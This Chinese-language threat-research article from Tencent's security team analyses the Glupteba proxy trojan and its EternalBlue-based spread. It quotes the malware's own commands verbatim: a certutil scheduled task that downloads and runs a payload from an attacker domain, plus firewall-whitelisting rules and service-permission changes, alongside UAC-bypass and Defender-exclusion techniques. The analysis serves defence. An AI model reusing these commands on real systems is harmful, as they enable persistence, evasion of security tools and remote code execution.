产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御验证码
T-Sec 天御文本内容安全
T-Sec 天御视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→
解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
NEW
最新动态
威胁研究
合作伙伴
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云

威胁研究

正文

Glupteba恶意代理木马利用“永恒之蓝”漏洞传播感染量激增

2018-05-25 08:51:24

近日腾讯御见威胁情报中心监测到大量下载Glupteba恶意代理木马。不同以往的是，该恶意木马并未通过Operation Windigo僵尸网络进行传播，而是通过其他的木马下载器（Scheduled.exe）进行传播。进一步溯源分析发现，该木马下载器利用“永恒之蓝”漏洞进行传播，从而导致了该木马的感染量的激增。

1、概述

Glupteba木马会绕过UAC，以管理员权限和系统权限运行，会创建防火墙策略，将木马程序加入白名单；修改Windows Defender策略，将木马程序添加到病毒查杀白名单。木马会收集中毒电脑的隐私信息，利用中毒电脑挖矿。

2、详细分析

Scheduled.exe分析：

scheduled.exe首先申请空间，释放PE文件执行。将释放的PE dump出来，发现是golang编写的，利用IDA python脚本将函数重命名。释放的PE首先执行写入配置信息到注册表HEKY_CURRENT_USER/Software/Microsoft/TestApp中。

（写入配置信息）

然后判断是否是管理员权限，如果不是，则利用写注册表

"HKCU\Software\Classes\mscfile\shell\open\command"

然后通过启动CompMgmtLauncher绕过UAC以管理员权限重新启动自己。

（运行CompMgmtLauncher）

重启后再判断是否是系统权限，如果不是则通过以TrustedInstaller运行自己提高权限。

（以TrustedInstaller运行）

判断自己路径名是否是"C:\Windows\rss\csrss.exe"，如果不是则执行安装逻辑。

首先会判断是否在虚拟机中运行。

（检查VirtualBox）

然后添加防火墙策略，并设置注册表配置firewall键值为1，将程序启动加入Windows防火墙的白名单。

cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

cmd.exe /C "netsh advfirewall firewall add rule name="CloudNet" dir=in action=allow program="C:\Users\admin\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" enable=yes"

创建其他释放文件相关目录，并写入注册表

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\"的paths和processs下的子健。并且设置注册表配置defender键值为1。

（创建目录文件夹）

最后将自身移动到”C:\Windows\rss\”下，重命名”csrss.exe”，设置文件夹隐藏，并设置注册表Software\Microsoft\Windows\CurrentVersion\RUN，最后重新启动csrss.exe。

（设置自启）

重启后再向服务器注册bot将服务器返回数据再写入注册表配置UUID(后续下载的CloudNet启动需要)。

（注册bot）

注册bot完成后创建两个任务分别用于执行自己和更新自己。

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f http://dp.fastandcoolest.com/scheduled.exe C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F

然后再释放3个sys文件和1个exe文件到目标目录设置隐藏属性，并加载驱动和exe。"C:\Windows\System32\drivers\"下释放三个隐藏sys文件：

Winmon.sys用于隐藏对应PID进程。

WinmonFS.sys隐藏指定文件或目录。

WinmonProcessMonitor.sys查找指定进程，并关闭。

（WinmonFS.sys隐藏文件）

C:\Windows\下释放一个exe文件：

Windefender.exe

添加规则到windows defender。

cmd.exe /C sc sdset Winmon D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

cmd.exe /C sc sdset WinmonFS D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

cmd.exe /C sc sdset WinmonProcessMonitor D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

添加完规则后，会将服务器返回cloudnet.exe下载地址"http[:]//skynetstop.com/cloudnet.exe"写入到注册表配置信息中的CloudenetSource中，然后开启6个线程。

（创建线程）

6个线程分别作用是：

1.监测服务更新

2.监测保护CloudNet

3.监测保护Defender

4.下载矿机和挖矿代理配置信息

5.监测全屏窗口时则下载其他软件安装

6.获取掩码利用永恒之蓝攻击局域网机器

（第三方软件下载器）

（下载窃取浏览器个人数据插件）

（矿机）

（永恒之蓝payload模块下载app.exe）

开启线程后，再等待服务器指令，执行其他功能，例如上传下载执行等功能。

（部分功能函数）

Windefender.exe分析：

windefender.exe同样是由golang编写，首先将自己写入windows defender规则。

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

然后获取注册表配置信息CloudenetSource，去下载执行Cloudnet.exe。